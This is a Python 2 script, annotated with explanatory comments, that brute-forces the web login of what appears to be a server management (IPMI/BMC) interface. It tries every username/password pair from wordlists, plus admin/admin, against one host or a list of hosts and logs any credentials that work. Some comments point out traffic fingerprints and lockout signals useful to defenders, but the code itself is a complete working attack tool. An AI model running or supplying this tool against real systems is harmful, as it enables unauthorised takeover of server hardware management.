#!/usr/bin/env python
# -*- coding:utf-8 -*-
#import lib files
import os
import sys
import logging
import requests
from optparse import OptionParser
#global configuration set
# Python 2 only: site.py removes sys.setdefaultencoding at interpreter start,
# so sys is reloaded to get it back and the process-wide implicit
# str<->unicode codec is switched from ASCII to UTF-8. Neither the reload()
# builtin nor sys.setdefaultencoding exists on Python 3.
reload(sys)
sys.setdefaultencoding("utf-8")
# Root logger at INFO with a timestamp prefix. No filename or stream is given,
# so basicConfig attaches its default stderr handler. crack() writes the
# username and password of every accepted login through this logger, which
# makes the captured output sensitive and worth storing accordingly.
logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)
#global variable definitions
# Request headers attached to every login POST made by login_packet_send.
# The set is static, so all traffic produced by this script carries the same
# browser-like User-Agent / Accept-Language combination, which is a usable
# fingerprint when reviewing proxy or web-server logs.
HEADER = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/json;charset=utf-8",
}

# Substring that vuln_check requires in a response body before it treats the
# login as accepted.
SUCCESS_FLAG = "SESSION_COOKIE"

# Built-in candidates. config_read_from_file appends to these lists in place,
# so the admin/admin pair is tried on every run, with or without wordlists.
USERNAME_LIST = ["admin"]
PASSWORD_LIST = ["admin"]
#global functions defines
def _append_lines_from(path, bucket):
    """Append every line of *path*, minus its line ending, to *bucket*.

    Any exception while opening or reading is logged and swallowed. That
    includes the TypeError raised by open(None) when the matching command
    line option was not supplied. Entries appended before the failure stay
    in *bucket*.
    """
    try:
        with open(path, "r") as handle:
            for raw in handle.readlines():
                # Cut at the first LF, then at the first CR, so both Unix and
                # Windows line endings are removed. Blank lines are kept as
                # empty-string entries.
                bucket.append(raw.split("\n")[0].split("\r")[0])
    except Exception as ex:
        logging.error("[-] Configuration Read From File Failed! Reason:%s" % str(ex))
        logging.info("[+] Use Default Dict!")


def config_read_from_file(userfile, pswdfile):
    """Extend the module-level candidate lists from two wordlist files.

    Lines of *userfile* are appended to USERNAME_LIST and lines of *pswdfile*
    to PASSWORD_LIST. The lists are extended, never replaced, so the built-in
    entries remain in front of whatever the files contribute. The two files
    are handled independently: a failure on one does not prevent the other
    from being read.

    Always returns 0, including when neither file could be read.
    """
    logging.info("[+] Read Configuration From File ...")
    _append_lines_from(userfile, USERNAME_LIST)
    _append_lines_from(pswdfile, PASSWORD_LIST)
    return 0
def login_packet_send(target, username, password):
    """POST one username/password pair to the target's web-session endpoint.

    The request goes to http://<target>/rpc/WEBSES/create.asp with the
    module-level HEADER set and a five second timeout. The scheme is plain
    http, so the candidate credentials cross the network unencrypted and are
    readable by anything on the path.

    NOTE(review): HEADER declares a JSON Content-Type, while passing a dict
    through ``data=`` makes requests form-encode the body. The mismatch
    between declared and actual encoding is visible in captured traffic.

    Returns the raw response body when the HTTP status is 200. Returns -1
    when the request raised (the reason is logged) or the status was anything
    else, so callers must compare against -1 before treating the result as
    content.
    """
    form_fields = {"WEBVAR_USERNAME": username, "WEBVAR_PASSWORD": password}
    try:
        reply = requests.post(
            "http://%s/rpc/WEBSES/create.asp" % str(target),
            headers=HEADER,
            data=form_fields,
            timeout=5,
        )
    except Exception as ex:
        logging.error("[-] Connect Failed Reason:%s" % str(ex))
        return -1
    if reply.status_code == 200:
        return reply.content
    return -1
def vuln_check(content):
    """Classify a login response body as accepted (0) or rejected (-1).

    Despite the name, no vulnerability is probed here. The body counts as an
    accepted login only when it contains SUCCESS_FLAG and does not contain
    the failure marker string. The decision is pure substring matching on the
    response text, with no parsing of the body.
    """
    if content.find(SUCCESS_FLAG) < 0:
        return -1
    if content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") >= 0:
        return -1
    return 0
def crack(target, username, password):
    """Try a single credential pair against *target* and report the outcome.

    Returns 0 when login_packet_send produced a body that vuln_check accepts,
    and -1 in every other case (request failure, non-200 status, rejected
    login).

    On success the target, username and password are written in clear text
    to the root logger at INFO level, so the log output has to be protected
    like the credentials themselves.
    """
    body = login_packet_send(target, username, password)
    if body == -1:
        return -1
    if vuln_check(body) != 0:
        return -1
    logging.info("[*] Crack %s Success! Username:%s,Password:%s" % (str(target), str(username), str(password)))
    return 0
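def scan(target, targettype):
    """Run every USERNAME_LIST x PASSWORD_LIST pair against the target(s).

    Args:
        target: a single host string when *targettype* is not 1, or the path
            of a file holding one host per line when *targettype* is 1.
        targettype: 1 selects file mode; any other value selects single-host
            mode.

    In file mode each line has its line ending and all spaces removed. Blank
    lines are skipped so they do not turn into requests against an empty
    host. A failure to read the file is logged instead of being silently
    ignored; hosts read before the failure are still processed.

    Attempts are made sequentially, with no delay and no early exit after an
    accepted login, so one run produces len(USERNAME_LIST) *
    len(PASSWORD_LIST) login POSTs per host. That burst of attempts from one
    source is the pattern that failed-login alerting or account lockout on
    the management interface should be tuned to catch.

    Returns None; outcomes are reported by crack() through logging.
    """
    targetlist = []
    if targettype == 1:
        try:
            with open(target, "r") as fr:
                for line in fr:
                    host = line.split("\n")[0].split("\r")[0].replace(" ", "")
                    if host:
                        targetlist.append(host)
        except Exception as ex:
            # Previously swallowed with a bare pass, which made an unreadable
            # target file indistinguishable from an empty one.
            logging.error("[-] Target File Read Failed! Reason:%s" % str(ex))
    elif target:
        targetlist = [target]
    for item in targetlist:
        for user in USERNAME_LIST:
            for pswd in PASSWORD_LIST:
                crack(item, user, pswd)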
#main function -- programme
if __name__ == "__main__":
    # Command line: -t takes a single host, -f a file of hosts, -u and -p the
    # username and password wordlists. All four are optional.
    cli = OptionParser()
    cli.add_option("-t", "--target", dest="target", help="target to check")
    cli.add_option("-f", "--filename", dest="targetfile", help="targetfiel to check")
    cli.add_option("-u", "--userfile", dest="userfile", help="username dict")
    cli.add_option("-p", "--pswdfile", dest="pswdfile", help="password dict")
    opts, _positional = cli.parse_args()

    # Wordlists are loaded first. A missing option arrives here as None and
    # is reported by config_read_from_file as a failed read.
    config_read_from_file(opts.userfile, opts.pswdfile)

    # -t wins over -f when both are given. With neither, nothing is scanned
    # and the script exits without printing usage.
    unset_values = ("", None, " ")
    if opts.target not in unset_values:
        scan(opts.target, 0)
    elif opts.targetfile not in unset_values:
        scan(opts.targetfile, 1)